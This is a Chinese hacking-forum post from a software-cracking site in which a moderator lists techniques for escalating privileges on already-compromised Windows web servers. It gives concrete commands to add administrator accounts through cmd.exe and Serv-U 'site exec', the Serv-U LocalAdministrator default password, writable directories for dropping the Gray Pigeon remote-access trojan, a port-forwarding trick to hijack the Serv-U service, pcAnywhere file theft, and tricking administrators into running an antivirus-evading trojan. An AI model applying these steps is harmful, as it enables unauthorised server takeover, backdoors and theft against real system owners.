找回密码
 立即注册

QQ登录

只需一步,快速开始

1401软件论坛总版规【新人必看】如何正确发布收费帖子加入vip系统学习仅需498元免费获得1401软件安全论坛vip开通本站VIP会员请联系QQ 564853771
论坛纪念优盘Beyond EXE超强加密器V1.61401论坛破解工具包 2017-9-12[破解班vip]入门篇[破解班vip]基础篇
[破解班vip]脱壳篇[破解班vip]实战篇[破解班vip]网络验证篇[破解班vip]零基础HOOK教程[破解班vip]零基础易语言入门
[破解班vip]零基础c语言入门[破解班vip]零基础Delphi编程入门[破解班vip]寒假培训课程共7课[破解班vip]破解提高篇[破解班vip]易语言培训课程
[破解班vip]核心技术培训篇[破解班vip]pe格式与pe操作[破解班vip]2022全新封包-山寨-爆破全系列[原创课程]c++单文档框架课程[逆向班vip]汇编语句与反汇编基础
[逆向班vip]全自动扫雷辅助[逆向班vip]手机模拟按键[逆向班vip]植物大战僵尸辅助广告位招租...付费破解软件 +Q 564853771
查看: 2967|回复: 0

【增加提权成功率技巧分享】

[复制链接]
  • TA的每日心情
    开心
    2016-12-31 19:24
  • 签到天数: 148 天

    [LV.7]常住居民III

    335

    主题

    380

    回帖

    1693

    积分

    版主

    【KingSolomon】

    UID
    972
    元宝
    340
    威望
    458
    贡献
    19
    信誉值
    0
    精华
    17
    在线时间
    179 小时
    注册时间
    2014-5-16
    最后登录
    2017-1-4
    违规
    0
    积分
    1693

    最佳新人活跃会员热心会员灌水之王论坛元老吾爱富翁工具大师已有小成

    QQ
    发表于 2014-6-16 20:27:07 | 显示全部楼层 |阅读模式
    Ȧ
    一:首先检测一下网站的服务器是否开了 3389 远程终端
    二:检测一下服务是否用了serv-u (还有是什么版本的)
    方法
    一:复制一个网站 用 3389 登陆器连接一下 (是否成功)
    能连接了,拿下服务器的机率,提高 30%了
    二:用ftp模式查下一个服务器的版本
    开始 -- 运行 -- cmd -- ftp (加你要登陆的网站)
    ---------------------------------------------------------------------------------------
    第一步:最简单的方法
    看有没有权限,能不能执行命令,行的话直接传个 鸽子 运行(成功率非常低)
    ----------------------------------------------------------------------------------------
    第二步::寻找有执行的权限目录
    c:\winnt\system32\inetsrv\data\
    c:\Documents and Settings\All Users\
    c:\Program Files\serv-u\
    C:\Program Files\Microsoft SQL Server\
    这样的目录可以直接上传 鸽子 ,运行
    -----------------------------------------------------------------------------------
    第三步:传个cmd和开帐号的ftp.exe上去直接加帐号
    命令就是你上传目录D:\VMware Workstation\cmd.exe"net user xiao xiao /add"
    -----------------------------------------------------------------------------------
    第四步:asp提权 木马 直接提权
    serv-u 6.3 版本 好象用asp提权 木马 (不成功)
    serv-u 6.2 版本 好象可以
    不过提权能不能用asp 木马 还要看服务器,设置的变态不
    假设直接用asp提权成功之后,还是不成功,但是可以在
    cmd之下 用这个帐号连接一下
    ftp (加你提权的网站)
    帐号:LocalAdministrator 密码:$ak#.1k;0@p">#1@$ak#.1k;0@p
    如果成功连接后就可以直接添加管理员帐号了
    命令:quote site exec (你添加的帐号) net user 123 123 /ad
    quote site exec (把帐号提升到最高权限) net localgroup administartors 123 /add
    ---------------------------------------------------------------------------------------
    第五步:pcaanywhere
    C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
    这里下他的GIF文件,在本地安装pcanywhere上去
    网上很多教程

    ---------------------------------------------------------------------------------------
    第六步:serv-u覆盖提权
    本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini
    网上很多教程
    ----------------------------------------------------------------------------------------
    第七步:Serv-U转发端口
    给Latte加盐 曾经做个一个(serv-u经典提权全套教程)用到过这个方法,可以学习一下
    上传个端口转发工具
    命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
    意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,
    IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,
    连接上后你就可以管理他的Serv-u了
    --------------------------------------------------------------------------------------------
    第八步:社会 工程学 之提升提权
    把灰鸽子传到上面,然后转移到c盘,就等着管理员运行了,前提你的 鸽子 必须免杀
    要是让我看到一个不清楚的exe程序,老想点开看看,呵呵(方法比较笨)

    本帖被以下淘专辑推荐:

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|Archiver|手机版|小黑屋|1401软件安全 ( ICP备16034480号 )

    GMT+8, 2024-3-28 22:00 , Processed in 0.152685 second(s), 28 queries , Gzip On.

    Powered by Discuz! X3.5

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表